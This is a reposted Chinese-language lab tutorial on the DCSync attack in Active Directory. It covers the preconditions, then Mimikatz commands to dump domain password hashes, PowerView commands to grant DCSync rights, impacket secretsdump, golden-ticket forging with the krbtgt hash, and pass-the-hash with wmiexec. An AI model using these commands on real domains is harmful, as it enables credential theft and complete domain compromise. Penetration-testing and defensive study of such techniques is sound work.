DCSync概述
DCSync是一種用于獲取用戶憑據的方法,可以用來查找DC,請求目錄復制,并從后續回應中收集密碼哈希,在2015年成為Mimikatz工具的一個板塊,可以在一定條件下匯出域內哈希,
實驗環境
域名:HIRO
域控:[email protected] 域管:hiro\administrator
主機:[email protected] 域用戶:hiro\win7
利用條件:
1.域控本地管理組用戶(administrators,Domain Admins,Enterprise Admins的組內用戶)
2.域控制器的計算機用戶(可能域控有CVE-2020-1472漏洞[ZeroLogon])
3.拿下exchange服務器后可以WriteACL賦予指定用戶或域機器DCSync權限
利用方式:
1.擁有上述條件的任意用戶權限,即可匯出域內任意用戶的hash
匯出administrator用戶的Hash
privilege::debug
lsadump::dcsync /domain:hiro.com /user:administrator
匯出所有用戶的哈希
privilege::debug
lsadump::dcsync /domain:hiro.com /all /csv
2.使用Empire下的powerview.ps1腳本執行以上三條ACE
DCsync是幾個權限的集合體,如果使其具有DCSync權限的話,可以向域內普通用戶添加如下三條ACE(Access Control Entries):
DS-Replication-Get-Changes-->(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-All-->(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-->(GUID:89e95b76-444d-4c62-991a-0facbeda640c)
在域管用戶上給域用戶win7添加以上三條ACE
Add-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose
當用戶win7具有DCSync權限后,可以匯出域內哈希:
python3 secretsdump.py hiro.com/win7:[email protected] -dc-ip 192.168.228.10
給域用戶win7洗掉以上三條ACE
Remove-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose
域用戶win7失去了DCSync權限,同時也無法匯出域內hash了
3.使用黃金票據+DCSync匯出域內所有用戶的Hash:
生成黃金票據:
privilege::debug
得到krbtgt用戶hash
lsadump::dcsync /domain:hiro.com /user:krbtgt
匯入黃金票據,其中sid為域的sid
kerberos::golden /user:administrator /domain:hiro.com /sid:S-1-5-21-1909134247-741334235-3019370817 /krbtgt:5f468f6d7ac43c327396d832a0241d81 /ptt
匯出域hash:
privilege::debug
kerberos::list
匯出所有用戶的哈希
lsadump::dcsync /domain:hiro.com /all /csv
哈希傳遞
python3 .\wmiexec.py hiro/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e9bf196dc93a1219e3b2e79b1b7aa36e
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/285627.html
標籤:其他
上一篇:談談網路協議 – 物理層
下一篇:幾種常見網路抓包方式介紹